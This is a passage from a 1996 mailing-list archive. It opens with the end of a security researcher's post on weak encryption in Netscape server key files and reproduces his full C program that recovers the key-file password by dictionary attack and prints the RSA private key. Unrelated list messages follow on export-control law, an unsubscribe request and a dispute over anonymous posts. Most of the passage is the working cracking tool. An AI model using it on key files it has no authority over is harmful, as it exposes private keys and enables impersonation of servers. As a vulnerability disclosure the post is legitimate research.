are PKCS #8 (which has problems, as demonstrated above), and Microsoft's
recently-proposed PFX (Personal Information Exchange) data format and protocol
(PFX is designed to allow users to move their keys, certificates and other
personal information securely from one platform to another, you can get more
info on it from http://www.microsoft.com/intdev/security/misf11_7.htm), which
is too new to comment on. It would be useful if a portable, secure private-key
format at the same level as the X.509 effort were developed to solve this
problem.

For the curious (and ASN.1-aware), here's what the data formats look like.
First there's the outer encapsulation which Netscape use to wrap up the
encrypted key:

NetscapeServerKey ::= SEQUENCE {
    identifier OCTET STRING ('private-key'),
    encryptedPrivateKeyInfo EncryptedPrivateKeyInfo
    }

Inside this is a PKCS #8 private key:

EncryptedPrivateKeyInfo ::= SEQUENCE {
    encryptionAlgorithm EncryptionAlgorithmIdentifier,
    encryptedData EncryptedData
    }

EncryptionAlgorithmIdentifier ::= AlgorithmIdentifier

EncryptedData = OCTET STRING

Now the EncryptionAlgorithmIdentifier is supposed to be something like
pbeWithMD5AndDES, with an associated 64-bit salt and iteration count, but
Netscape ignored this and used straight rc4 with no salt or iteration count.
The EncryptedData decrypts to:

PrivateKeyInfo ::= SEQUENCE {
    version Version
    privateKeyAlgorithm PrivateKeyAlgorithmIdentifier
    privateKey PrivateKey
    attributes [ 0 ] IMPLICIT Attributes OPTIONAL
    }

Version ::= INTEGER

PrivateKeyAlgorithmIdentifier ::= AlgorithmIdentifier

PrivateKey ::= OCTET STRING

Attributes ::= SET OF Attribute

The algorithm information is encoded as:

AlgorithmIdentifier ::= SEQUENCE {
    algorithm ALGORITHM.&id( { SupportedAlgorithms } ),
    parameters ALGORITHM.&Type( { SupportedAlgorithms }{ @algorithm } ) OPTIONAL
    }

SupportedAlgorithms ALGORITHM ::= { ... }

ALGORITHM ::= TYPE-IDENTIFIER

(and so on and so on, I haven't bothered going down any further).

The EncryptionAlgorithmIdentifier is '1 2 840 113549 3 4' or { iso(1)
member-body(2) US(840) rsadsi(113549) algorithm(3) rc4(4) }. The
PrivateKeyAlgorithmIdentifier is '1 2 840 113549 1 1 1' or { iso(1)
member-body(2) US(840) rsadsi(113549) pkcs(1) pkcs1-1(1) rsaEncryption(1) }.

Included below is the code to perform the attack (set tabs to 4, phasers to
stun). Do I get a t-shirt for this? :-)

Peter.

-- Snip --

/* BreakSK - Break Netscape server key file encryption via dictionary attack.
   Written by Peter Gutmann 26 September 1996 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>	/* UINT_MAX, used to select the RC4 word size */

/* Most of the code here was ripped out of cryptlib and is somewhat messy as
   a consequence. cryptlib has fairly extensive self-configuration and an
   internal API which hides machine-specific details, this program doesn't
   (the code here really wasn't meant for standalone use). As a result you
   need to manually define LITTLE_ENDIAN or BIG_ENDIAN, and it won't work at
   all on 64-bit systems.
   If you want the portability, use cryptlib instead */

#define LITTLE_ENDIAN
/* #define BIG_ENDIAN */

/* Workarounds for cryptlib defines, constants, and macros */

#define MASK32(x) x
#define FALSE 0
#define TRUE !FALSE

typedef unsigned char BYTE;
typedef unsigned long LONG;
typedef int BOOLEAN;

/* Functions to convert the endianness from the canonical form to the
   internal form. bigToLittle() convert from big-endian in-memory to
   little-endian in-CPU, littleToBig() convert from little-endian in-memory
   to big-endian in-CPU */

void longReverse( LONG *buffer, int count );

#ifdef LITTLE_ENDIAN
  #define bigToLittleLong( x, y ) longReverse(x,y)
  #define littleToBigLong( x, y )
#else
  #define bigToLittleLong( x, y )
  #define littleToBigLong( x, y ) longReverse(x,y)
#endif /* LITTLE_ENDIAN */

/* Byte-reverse an array of 16- and 32-bit words to/from network byte order
   to account for processor endianness. These routines assume the given
   count is a multiple of 16 or 32 bits. They are safe even for CPU's with
   a word size > 32 bits since on a little-endian CPU the important 32 bits
   are stored first, so that by zeroizing the first 32 bits and oring the
   reversed value back in we don't need to rely on the processor only writing
   32 bits into memory */

void longReverse( LONG *buffer, int count )
	{
#if defined( _BIG_WORDS )
	BYTE *bufPtr = ( BYTE * ) buffer, temp;

	count /= 4; /* sizeof( LONG ) != 4 */
	while( count-- )
		{
		/* There's really no nice way to do this - the above code generates
		   misaligned accesses on processors with a word size > 32 bits, so
		   we have to work at the byte level (either that or turn misaligned
		   access warnings off by trapping the signal the access corresponds
		   to.
		   However a context switch per memory access is probably somewhat
		   slower than the current byte-twiddling mess) */
		temp = bufPtr[ 3 ];
		bufPtr[ 3 ] = bufPtr[ 0 ];
		bufPtr[ 0 ] = temp;
		temp = bufPtr[ 2 ];
		bufPtr[ 2 ] = bufPtr[ 1 ];
		bufPtr[ 1 ] = temp;
		bufPtr += 4;
		}
#else
	LONG value;

	count /= sizeof( LONG );
	while( count-- )
		{
		value = *buffer;
		value = ( ( value & 0xFF00FF00UL ) >> 8 ) | \
				( ( value & 0x00FF00FFUL ) << 8 );
		*buffer++ = ( value << 16 ) | ( value >> 16 );
		}
#endif /* _BIG_WORDS */
	}

#define mputLLong(memPtr,data) \
		memPtr[ 0 ] = ( BYTE ) ( ( data ) & 0xFF ); \
		memPtr[ 1 ] = ( BYTE ) ( ( ( data ) >> 8 ) & 0xFF ); \
		memPtr[ 2 ] = ( BYTE ) ( ( ( data ) >> 16 ) & 0xFF ); \
		memPtr[ 3 ] = ( BYTE ) ( ( ( data ) >> 24 ) & 0xFF ); \
		memPtr += 4

/****************************************************************************
*                                                                           *
*                                    MD5                                    *
*                                                                           *
****************************************************************************/

/* The MD5 block size and message digest sizes, in bytes */

#define MD5_DATASIZE 64
#define MD5_DIGESTSIZE 16

/* The structure for storing MD5 info */

typedef struct {
	LONG digest[ 4 ]; /* Message digest */
	LONG countLo, countHi; /* 64-bit bit count */
	LONG data[ 16 ]; /* MD5 data buffer */
#ifdef _BIG_WORDS
	BYTE dataBuffer[ MD5_DATASIZE ]; /* Byte buffer for data */
#endif /* _BIG_WORDS */
	BOOLEAN done; /* Whether final digest present */
	} MD5_INFO;

/* Round 1 shift amounts */

#define S11 7
#define S12 12
#define S13 17
#define S14 22

/* Round 2 shift amounts */

#define S21 5
#define S22 9
#define S23 14
#define S24 20

/* Round 3 shift amounts */

#define S31 4
#define S32 11
#define S33 16
#define S34 23

/* Round 4 shift amounts */

#define S41 6
#define S42 10
#define S43 15
#define S44 21

/* F, G, H and I are basic MD5 functions */

#define F(X,Y,Z) ( ( X & Y ) | ( ~X & Z ) )
#define G(X,Y,Z) ( ( X & Z ) | ( Y & ~Z ) )
#define H(X,Y,Z) ( X ^ Y ^ Z )
#define I(X,Y,Z) ( Y ^ ( X | ~Z ) )

/* ROTATE_LEFT rotates x left n bits */

#define ROTATE_LEFT(x,n) ( ( x << n ) | ( x >> ( 32 - n ) ) )

/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */

#define FF(A,B,C,D,X,shiftAmt,magicConst) \
	A += F( B, C, D ) + X + magicConst; \
	A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B )

#define GG(A,B,C,D,X,shiftAmt,magicConst) \
	A += G( B, C, D ) + X + magicConst; \
	A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B )

#define HH(A,B,C,D,X,shiftAmt,magicConst) \
	A += H( B, C, D ) + X + magicConst; \
	A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B )

#define II(A,B,C,D,X,shiftAmt,magicConst) \
	A += I( B, C, D ) + X + magicConst; \
	A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B )

/* Basic MD5 step. Transforms digest based on data. Note that if the
   Mysterious Constants are arranged backwards in little-endian order and
   decrypted with DES they produce OCCULT MESSAGES! */

void MD5Transform( LONG *digest, LONG *data )
	{
	LONG A, B, C, D;

	/* Set up local data */
	A = digest[ 0 ];
	B = digest[ 1 ];
	C = digest[ 2 ];
	D = digest[ 3 ];

	/* Round 1 */
	FF( A, B, C, D, data[ 0 ], S11, 3614090360UL ); /* 1 */
	FF( D, A, B, C, data[ 1 ], S12, 3905402710UL ); /* 2 */
	FF( C, D, A, B, data[ 2 ], S13, 606105819UL ); /* 3 */
	FF( B, C, D, A, data[ 3 ], S14, 3250441966UL ); /* 4 */
	FF( A, B, C, D, data[ 4 ], S11, 4118548399UL ); /* 5 */
	FF( D, A, B, C, data[ 5 ], S12, 1200080426UL ); /* 6 */
	FF( C, D, A, B, data[ 6 ], S13, 2821735955UL ); /* 7 */
	FF( B, C, D, A, data[ 7 ], S14, 4249261313UL ); /* 8 */
	FF( A, B, C, D, data[ 8 ], S11, 1770035416UL ); /* 9 */
	FF( D, A, B, C, data[ 9 ], S12, 2336552879UL ); /* 10 */
	FF( C, D, A, B, data[ 10 ], S13, 4294925233UL ); /* 11 */
	FF( B, C, D, A, data[ 11 ], S14, 2304563134UL ); /* 12 */
	FF( A, B, C, D, data[ 12 ], S11, 1804603682UL ); /* 13 */
	FF( D, A, B, C, data[ 13 ], S12, 4254626195UL ); /* 14 */
	FF( C, D, A, B, data[ 14 ], S13, 2792965006UL ); /* 15 */
	FF( B, C, D, A, data[ 15 ], S14, 1236535329UL ); /* 16 */

	/* Round 2 */
	GG( A, B, C, D, data[ 1 ], S21, 4129170786UL ); /* 17 */
	GG( D, A,
		B, C, data[ 6 ], S22, 3225465664UL ); /* 18 */
	GG( C, D, A, B, data[ 11 ], S23, 643717713UL ); /* 19 */
	GG( B, C, D, A, data[ 0 ], S24, 3921069994UL ); /* 20 */
	GG( A, B, C, D, data[ 5 ], S21, 3593408605UL ); /* 21 */
	GG( D, A, B, C, data[ 10 ], S22, 38016083UL ); /* 22 */
	GG( C, D, A, B, data[ 15 ], S23, 3634488961UL ); /* 23 */
	GG( B, C, D, A, data[ 4 ], S24, 3889429448UL ); /* 24 */
	GG( A, B, C, D, data[ 9 ], S21, 568446438UL ); /* 25 */
	GG( D, A, B, C, data[ 14 ], S22, 3275163606UL ); /* 26 */
	GG( C, D, A, B, data[ 3 ], S23, 4107603335UL ); /* 27 */
	GG( B, C, D, A, data[ 8 ], S24, 1163531501UL ); /* 28 */
	GG( A, B, C, D, data[ 13 ], S21, 2850285829UL ); /* 29 */
	GG( D, A, B, C, data[ 2 ], S22, 4243563512UL ); /* 30 */
	GG( C, D, A, B, data[ 7 ], S23, 1735328473UL ); /* 31 */
	GG( B, C, D, A, data[ 12 ], S24, 2368359562UL ); /* 32 */

	/* Round 3 */
	HH( A, B, C, D, data[ 5 ], S31, 4294588738UL ); /* 33 */
	HH( D, A, B, C, data[ 8 ], S32, 2272392833UL ); /* 34 */
	HH( C, D, A, B, data[ 11 ], S33, 1839030562UL ); /* 35 */
	HH( B, C, D, A, data[ 14 ], S34, 4259657740UL ); /* 36 */
	HH( A, B, C, D, data[ 1 ], S31, 2763975236UL ); /* 37 */
	HH( D, A, B, C, data[ 4 ], S32, 1272893353UL ); /* 38 */
	HH( C, D, A, B, data[ 7 ], S33, 4139469664UL ); /* 39 */
	HH( B, C, D, A, data[ 10 ], S34, 3200236656UL ); /* 40 */
	HH( A, B, C, D, data[ 13 ], S31, 681279174UL ); /* 41 */
	HH( D, A, B, C, data[ 0 ], S32, 3936430074UL ); /* 42 */
	HH( C, D, A, B, data[ 3 ], S33, 3572445317UL ); /* 43 */
	HH( B, C, D, A, data[ 6 ], S34, 76029189UL ); /* 44 */
	HH( A, B, C, D, data[ 9 ], S31, 3654602809UL ); /* 45 */
	HH( D, A, B, C, data[ 12 ], S32, 3873151461UL ); /* 46 */
	HH( C, D, A, B, data[ 15 ], S33, 530742520UL ); /* 47 */
	HH( B, C, D, A, data[ 2 ], S34, 3299628645UL ); /* 48 */

	/* Round 4 */
	II( A, B, C, D, data[ 0 ], S41, 4096336452UL ); /* 49 */
	II( D, A, B, C, data[ 7 ], S42, 1126891415UL ); /* 50 */
	II( C, D, A, B, data[ 14 ], S43, 2878612391UL ); /* 51 */
	II( B, C, D, A, data[ 5 ], S44,
		4237533241UL ); /* 52 */
	II( A, B, C, D, data[ 12 ], S41, 1700485571UL ); /* 53 */
	II( D, A, B, C, data[ 3 ], S42, 2399980690UL ); /* 54 */
	II( C, D, A, B, data[ 10 ], S43, 4293915773UL ); /* 55 */
	II( B, C, D, A, data[ 1 ], S44, 2240044497UL ); /* 56 */
	II( A, B, C, D, data[ 8 ], S41, 1873313359UL ); /* 57 */
	II( D, A, B, C, data[ 15 ], S42, 4264355552UL ); /* 58 */
	II( C, D, A, B, data[ 6 ], S43, 2734768916UL ); /* 59 */
	II( B, C, D, A, data[ 13 ], S44, 1309151649UL ); /* 60 */
	II( A, B, C, D, data[ 4 ], S41, 4149444226UL ); /* 61 */
	II( D, A, B, C, data[ 11 ], S42, 3174756917UL ); /* 62 */
	II( C, D, A, B, data[ 2 ], S43, 718787259UL ); /* 63 */
	II( B, C, D, A, data[ 9 ], S44, 3951481745UL ); /* 64 */

	/* Build message digest */
	digest[ 0 ] = MASK32( digest[ 0 ] + A );
	digest[ 1 ] = MASK32( digest[ 1 ] + B );
	digest[ 2 ] = MASK32( digest[ 2 ] + C );
	digest[ 3 ] = MASK32( digest[ 3 ] + D );
	}

/****************************************************************************
*                                                                           *
*                           MD5 Support Routines                            *
*                                                                           *
****************************************************************************/

/* The routine md5Initial initializes the message-digest context md5Info */

void md5Initial( MD5_INFO *md5Info )
	{
	/* Clear all fields */
	memset( md5Info, 0, sizeof( MD5_INFO ) );

	/* Load magic initialization constants */
	md5Info->digest[ 0 ] = 0x67452301L;
	md5Info->digest[ 1 ] = 0xEFCDAB89L;
	md5Info->digest[ 2 ] = 0x98BADCFEL;
	md5Info->digest[ 3 ] = 0x10325476L;

	/* Initialise bit count */
	md5Info->countLo = md5Info->countHi = 0L;
	}

/* The routine MD5Update updates the message-digest context to account for
   the presence of each of the characters buffer[ 0 ..
   count-1 ] in the message whose digest is being computed */

void md5Update( MD5_INFO *md5Info, BYTE *buffer, int count )
	{
	LONG tmp;
	int dataCount;

	/* Update bitcount */
	tmp = md5Info->countLo;
	if ( ( md5Info->countLo = tmp + ( ( LONG ) count << 3 ) ) < tmp )
		md5Info->countHi++; /* Carry from low to high */
	md5Info->countHi += count >> 29;

	/* Get count of bytes already in data */
	dataCount = ( int ) ( tmp >> 3 ) & 0x3F;

	/* Handle any leading odd-sized chunks */
	if( dataCount )
		{
#ifdef _BIG_WORDS
		BYTE *p = md5Info->dataBuffer + dataCount;
#else
		BYTE *p = ( BYTE * ) md5Info->data + dataCount;
#endif /* _BIG_WORDS */

		dataCount = MD5_DATASIZE - dataCount;
		if( count < dataCount )
			{
			memcpy( p, buffer, count );
			return;
			}
		memcpy( p, buffer, dataCount );
#ifdef _BIG_WORDS
		copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE );
#else
		littleToBigLong( md5Info->data, MD5_DATASIZE );
#endif /* _BIG_WORDS */
		MD5Transform( md5Info->digest, md5Info->data );
		buffer += dataCount;
		count -= dataCount;
		}

	/* Process data in MD5_DATASIZE chunks */
	while( count >= MD5_DATASIZE )
		{
#ifdef _BIG_WORDS
		memcpy( md5Info->dataBuffer, buffer, MD5_DATASIZE );
		copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE );
#else
		memcpy( md5Info->data, buffer, MD5_DATASIZE );
		littleToBigLong( md5Info->data, MD5_DATASIZE );
#endif /* _BIG_WORDS */
		MD5Transform( md5Info->digest, md5Info->data );
		buffer += MD5_DATASIZE;
		count -= MD5_DATASIZE;
		}

	/* Handle any remaining bytes of data. */
#ifdef _BIG_WORDS
	memcpy( md5Info->dataBuffer, buffer, count );
#else
	memcpy( md5Info->data, buffer, count );
#endif /* _BIG_WORDS */
	}

/* Final wrapup - pad to MD5_DATASIZE-byte boundary with the bit pattern
   1 0* (64-bit count of bits processed, MSB-first) */

void md5Final( MD5_INFO *md5Info )
	{
	int count;
	BYTE *dataPtr;

	/* Compute number of bytes mod 64 */
	count = ( int ) md5Info->countLo;
	count = ( count >> 3 ) & 0x3F;

	/* Set the first char of padding to 0x80.
	   This is safe since there is always at least one byte free */
#ifdef _BIG_WORDS
	dataPtr = md5Info->dataBuffer + count;
#else
	dataPtr = ( BYTE * ) md5Info->data + count;
#endif /* _BIG_WORDS */
	*dataPtr++ = 0x80;

	/* Bytes of padding needed to make 64 bytes */
	count = MD5_DATASIZE - 1 - count;

	/* Pad out to 56 mod 64 */
	if( count < 8 )
		{
		/* Two lots of padding: Pad the first block to 64 bytes */
		memset( dataPtr, 0, count );
#ifdef _BIG_WORDS
		copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE );
#else
		littleToBigLong( md5Info->data, MD5_DATASIZE );
#endif /* _BIG_WORDS */
		MD5Transform( md5Info->digest, md5Info->data );

		/* Now fill the next block with 56 bytes */
#ifdef _BIG_WORDS
		memset( md5Info->dataBuffer, 0, MD5_DATASIZE - 8 );
#else
		memset( md5Info->data, 0, MD5_DATASIZE - 8 );
#endif /* _BIG_WORDS */
		}
	else
		/* Pad block to 56 bytes */
		memset( dataPtr, 0, count - 8 );
#ifdef _BIG_WORDS
	copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE );
#endif /* _BIG_WORDS */

	/* Append length in bits and transform */
	md5Info->data[ 14 ] = md5Info->countLo;
	md5Info->data[ 15 ] = md5Info->countHi;

#ifndef _BIG_WORDS
	littleToBigLong( md5Info->data, MD5_DATASIZE - 8 );
#endif /* _BIG_WORDS */
	MD5Transform( md5Info->digest, md5Info->data );

	md5Info->done = TRUE;
	}

/****************************************************************************
*                                                                           *
*                                    RC4                                    *
*                                                                           *
****************************************************************************/

/* If the system can handle byte ops, we use those so we don't have to do a
   lot of masking.
   Otherwise, we use machine-word-size ops which will be faster on RISC
   machines */

#if UINT_MAX > 0xFFFFL /* System has 32-bit ints */
  #define USE_LONG_RC4

  typedef unsigned int rc4word;
#else
  typedef unsigned char rc4word;
#endif /* UINT_MAX > 0xFFFFL */

/* The scheduled RC4 key */

typedef struct {
	rc4word state[ 256 ];
	rc4word x, y;
	} RC4KEY ;

/* Expand an RC4 key */

void rc4ExpandKey( RC4KEY *rc4, unsigned char const *key, int keylen )
	{
	int x, keypos = 0;
	rc4word sx, y = 0;
	rc4word *state = &rc4->state[ 0 ];

	rc4->x = rc4->y = 0;

	for( x = 0; x < 256; x++ )
		state[ x ] = x;

	for( x = 0; x < 256; x++ )
		{
		sx = state[ x ];
		y += sx + key[ keypos ];
#ifdef USE_LONG_RC4
		y &= 0xFF;
#endif /* USE_LONG_RC4 */
		state[ x ] = state[ y ];
		state[ y ] = sx;

		if( ++keypos == keylen )
			keypos = 0;
		}
	}

void rc4Crypt( RC4KEY *rc4, unsigned char *data, int len )
	{
	rc4word x = rc4->x, y = rc4->y;
	rc4word sx, sy;
	rc4word *state = &rc4->state[ 0 ];

	while (len--)
		{
		x++;
#ifdef USE_LONG_RC4
		x &= 0xFF;
#endif /* USE_LONG_RC4 */
		sx = state[ x ];
		y += sx;
#ifdef USE_LONG_RC4
		y &= 0xFF;
#endif /* USE_LONG_RC4 */
		sy = state[ y ];
		state[ y ] = sx;
		state[ x ] = sy;

#ifdef USE_LONG_RC4
		*data++ ^= state[ ( unsigned char ) ( sx+sy ) ];
#else
		*data++ ^= state[ ( sx+sy ) & 0xFF ];
#endif /* USE_LONG_RC4 */
		}

	rc4->x = x;
	rc4->y = y;
	}

/****************************************************************************
*                                                                           *
*                                Driver Code                                *
*                                                                           *
****************************************************************************/

/* Various magic values in the key file */

static BYTE netscapeKeyfileID[] = {
	0x04, 0x0B, 0x70, 0x72, 0x69, 0x76, 0x61, 0x74,
	0x65, 0x2D, 0x6B, 0x65, 0x79
	};
static BYTE rc4EncryptionID[] = {
	0x30, 0x0C, 0x06, 0x08, 0x2A, 0x86, 0x48, 0x86,
	0xF7, 0x0D, 0x03, 0x04, 0x05, 0x00
	};
static BYTE version[] = { 0x02, 0x01, 0x00 };
static BYTE rsaPrivateKeyID[] = {
	0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86,
	0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00
	};

/* General-purpose buffer.
   We make them static buffers to keep them off the stack on DOS/Win16
   boxes */

static BYTE buffer[ 1024 ], temp[ 1024 ];

/* Print a key component */

int printKeyComponent( BYTE *buffer, char *title )
	{
	int count, length = 0, totalLength = 2;

	printf( "%s = ", title );
	if( *buffer++ != 0x02 )
		{
		puts( "Bad data format in key component." );
		return( 0 );
		}

	/* Get the length of the component */
	if( *buffer & 0x80 )
		{
		count = *buffer++ & 0x7F;
		totalLength += count;
		while( count-- )
			length = ( length << 8 ) | *buffer++;
		}
	else
		length = *buffer++;
	totalLength += length;

	/* Print the data */
	for( count = 0; count < length; count++ )
		printf( "%02X", buffer[ count ] );
	putchar( '\n' );

	return( totalLength );
	}

/* The main program */

int main( int argc, char *argv[] )
	{
	FILE *keyFile, *dictFile;
	int count, length = 0;

	/* Check args and open the server key file */
	if( argc != 3 )
		{
		puts( "Usage: breaksk " );
		return( EXIT_FAILURE );
		}
	if( ( keyFile = fopen( argv[ 1 ], "rb" ) ) == NULL )
		{
		perror( argv[ 1 ] );
		return( EXIT_FAILURE );
		}

	/* Read the Netscape outer wrapper */
	if( getc( keyFile ) != 0x30 )
		{
		puts( "This doesn't look like a Netscape server key file." );
		exit( EXIT_FAILURE );
		}
	count = getc( keyFile ) & 0x7F;
	while( count-- )
		getc( keyFile );
	if( ( fread( buffer, 1, 13, keyFile ) != 13 ) || \
		memcmp( buffer, netscapeKeyfileID, 13 ) )
		{
		puts( "This doesn't look like a Netscape server key file." );
		exit( EXIT_FAILURE );
		}

	/* Read the PKCS #8 EncryptedPrivateKey wrapper */
	if( getc( keyFile ) != 0x30 )
		{
		puts( "This doesn't look like a Netscape server key file." );
		exit( EXIT_FAILURE );
		}
	count = getc( keyFile ) & 0x7F;
	while( count-- )
		getc( keyFile );
	if( ( fread( buffer, 1, 14, keyFile ) != 14 ) || \
		memcmp( buffer, rc4EncryptionID, 14 ) )
		{
		puts( "This doesn't look like an RC4-encrypted server key." );
		exit( EXIT_FAILURE );
		}

	/* Read the start of the EncryptedData field */
	if( getc( keyFile ) != 0x04 )
		{
		puts( "This doesn't look like a Netscape server key file."
			);
		exit( EXIT_FAILURE );
		}
	count = getc( keyFile ) & 0x7F;
	while( count-- )
		length = ( length << 8 ) | getc( keyFile );

	/* Read the encrypted RSAPrivateKey. The length comes from the file, so
	   make sure that it covers the 22 bytes of known plaintext checked
	   below and fits into the buffer before reading */
	if( length < 22 || length > ( int ) sizeof( buffer ) || \
		fread( buffer, 1, length, keyFile ) != ( size_t ) length )
		{
		puts( "Netscape server key file length fields are inconsistent." );
		exit( EXIT_FAILURE );
		}
	fclose( keyFile );

	/* We've got the data we want, now rumble through the dictionary trying
	   each key on it. First, make sure we can open the thing */
	if( ( dictFile = fopen( argv[ 2 ], "r" ) ) == NULL )
		{
		perror( argv[ 2 ] );
		return( EXIT_FAILURE );
		}
	while( TRUE )
		{
		BYTE hashedPassword[ MD5_DIGESTSIZE ], *hashedPassPtr = hashedPassword;
		MD5_INFO md5Info;
		RC4KEY rc4key;
		char dictWord[ 100 ];
		int dictWordLength, index;

		/* Get the next word from the dictionary */
		if( fgets( dictWord, 100, dictFile ) == NULL )
			{
			puts( "No more words in dictionary." );
			break;
			}
		dictWordLength = strlen( dictWord ) - 1;
		dictWord[ dictWordLength ] = '\0';

		/* Hash the word using MD5 */
		md5Initial( &md5Info );
		md5Update( &md5Info, ( BYTE * ) dictWord, dictWordLength );
		md5Final( &md5Info );
		for( index = 0; index < MD5_DIGESTSIZE / 4; index++ )
			{
			mputLLong( hashedPassPtr, md5Info.digest[ index ] );
			}

		/* Set up the RC4 key based on the hashed password */
		rc4ExpandKey( &rc4key, hashedPassword, MD5_DIGESTSIZE );

		/* Copy the data to a temporary buffer and try to decrypt it */
		memcpy( temp, buffer, length );
		rc4Crypt( &rc4key, temp, 22 );

		/* Check for known plaintext */
		if( temp[ 0 ] != 0x30 || !( temp[ 1 ] & 0x80 ) )
			continue;
		index = 1;
		count = temp[ index++ ] & 0x7F;
		while( count-- )
			index++;
		if( memcmp( temp + index, version, 3 ) )
			continue;
		index += 3;
		if( memcmp( temp + index, rsaPrivateKeyID, 15 ) )
			continue;

		/* We've found the password, display it and decrypt the rest of the
		   key */
		printf( "The password used to encrypt this Netscape server key "
				"is '%s'.\n\n", dictWord );
		index += 15;
		rc4Crypt( &rc4key, temp + 22, length - 22 );

		/* Skip the OCTET STRING encapsulation */
		if( temp[ index++ ]
!= 0x04 ) { /* Should never happen */ puts( "Bad data format in key file" ); break; } count = temp[ index++ ] & 0x7F; while( count-- ) index++; /* Skip the inner SEQUENCE encapsulation */ if( temp[ index++ ] != 0x30 ) { /* Should never happen */ puts( "Bad data format in key file" ); break; } count = temp[ index++ ] & 0x7F; while( count-- ) index++; /* Skip the version number. NB: This encoding is incorrect and violates the ASN.1 encoding rules. It's strange that the outer version number is encoded correctly, but the inner one isn't */ if( temp[ index++ ] != 0x02 || temp[ index++ ] != 0x00 ) { /* Should never happen */ puts( "Bad data format in key file" ); break; } /* OK, now we've reached the key components. Print each one out */ index += printKeyComponent( temp + index, "Modulus" ); index += printKeyComponent( temp + index, "Public exponent" ); index += printKeyComponent( temp + index, "Private exponent" ); index += printKeyComponent( temp + index, "Prime 1" ); index += printKeyComponent( temp + index, "Prime 2" ); index += printKeyComponent( temp + index, "Exponent 1" ); index += printKeyComponent( temp + index, "Exponent 2" ); index += printKeyComponent( temp + index, "Coefficient" ); break; } fclose( dictFile ); return( EXIT_SUCCESS ); } From declan at eff.org Wed Sep 25 15:14:38 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 26 Sep 1996 06:14:38 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609251126.HAA23625@pdj2-ra.F-REMOTE.CWRU.Edu> Message-ID: At today's SAFE crypto hearing in the House, Congressperns quizzed Gorelick about what the fuck the administration is trying to do by having their lackies attach amendments to the omnibus export act that would prevent judicial review of Commerce Dept export control decisions. It's already cleared the House. "no court shall have power or jurisdiction to review any such decision by an action in the nature of mandamus or otherwise." Bastards. -Declan On Wed, 25 Sep 1996, Peter D. 
Junger wrote:

> Greg Broiles writes in a most informative posting:
>
> : And that's what the ITAR is - a body of administrative law developed by the
> : executive branch pursuant to a grant of power from Congress. (e.g., 22 USC
> : 2778(a)(1), ". . . The President is authorized to designate those items
> : which shall be considered as defense articles and defense services for the
> : purposes of this section and to promulgate regulations for the import and
> : export of such articles and services. The items so designated shall
> : constitute the United States Munitions List.") It is subject to review by
> : the courts just like the product of Congress itself; and an agency can't do
> : something Congress can't do, like write an unconstitutional law.
>
> It should be added though that most administrative regulations are
> subject to judicial review by courts to make sure that they comply with
> the law passed by Congress. The ITAR, on the other hand, are not
> subject to this sort of review and can only be challenged in the courts
> on Constitutional grounds.
>
> --
> Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
> Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu
> URL: http://samsara.law.cwru.edu
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From temanuel at mecklermedia.com Wed Sep 25 15:25:17 1996
From: temanuel at mecklermedia.com (Tom Emanuel)
Date: Thu, 26 Sep 1996 06:25:17 +0800
Subject: No Subject
Message-ID: <199609251905.PAA17803@pizza.mecklermedia.com>

Please take me off this list or send instructions for so doing.
Tom Emanuel
Vice President Publication Licensing, Mecklermedia Corporation, 20 Ketchum Street, Westport, CT 06880:fax: 203-454-5840; URL: http://www.iworld.com; temanuel at mecklermedia.com

From deviant at pooh-corner.com Wed Sep 25 15:42:38 1996
From: deviant at pooh-corner.com (The Deviant)
Date: Thu, 26 Sep 1996 06:42:38 +0800
Subject: WHO IS MAKING A MOCKERY OF WHOM?
In-Reply-To: <199609251426.HAA02190@dfw-ix1.ix.netcom.com>
Message-ID:

On Wed, 25 Sep 1996, Marc J. Wohler wrote:

> Date: Wed, 25 Sep 1996 10:29:23 -0400
> From: "Marc J. Wohler"
> To: cypherpunks at toad.com
> Subject: Re: WHO IS MAKING A MOCKERY OF WHOM?
>
> At 05:55 PM 9/24/96 -0400, you wrote:
> >At 06:15 AM 9/24/96 -0700, Sandy Sandfort wrote:
> >
> >>C'punks,
> >>Time for another informal poll.
> >>
> >>On Mon, 23 Sep 1996, John Anonymous MacDonald wrote:
> >>> What a joy to make a public mockery of Tim Mayo!
> >>
> >>Do list members think Anonymous' posts make a public mockery of
> >>Tim May or Anonymous? Let me know whose reputation you think
> >>is enhanced or tarnished by these posts. I'll post a summary to
> >>the list in a week or two.
> >
> > I vote for Anonymous.
>
> Also, it seems evident that some non-anonymous posters aka KTOM seem to
> understand how to *abuse* our American freedoms but don't understand about
> *responsible* use.
>
> Is this a deliberate attempt to damage this list or is it that some folk
> just can't handle freedom?
>
> M. J. Wohler
>

I agree... the postings of Anonymous about "Timmy" pretty much just make us want to killfile "Anonymous" more and more. On the other hand (or maybe it's the same hand), Tim's response to these postings is basically "I have nothing to hide, take your best shot". Personally, I haven't seen Tim lie, cheat, steal, have sex with animals, etc., and until I do his rep. is fine to me.

--Deviant

Would it help if I got out and pushed?
-- Princess Leia Organa

From jsw at netscape.com Wed Sep 25 15:44:10 1996
From: jsw at netscape.com (Jeff Weinstein)
Date: Thu, 26 Sep 1996 06:44:10 +0800
Subject: [Long] How to break Netscape's server key encryption
In-Reply-To: <84366802803808@cs26.cs.auckland.ac.nz>
Message-ID: <3249833B.3EEE@netscape.com>

pgut001 at cs.auckland.ac.nz wrote:
>
> The Netscape server key format is very susceptible to both a dictionary attack
> and to keystream recovery. It uses the PKCS #8 format for private keys, which
> provides a large amount of known plaintext at the start of the data, in
> combination with RC4 without any form of IV or other preprocessing (even though
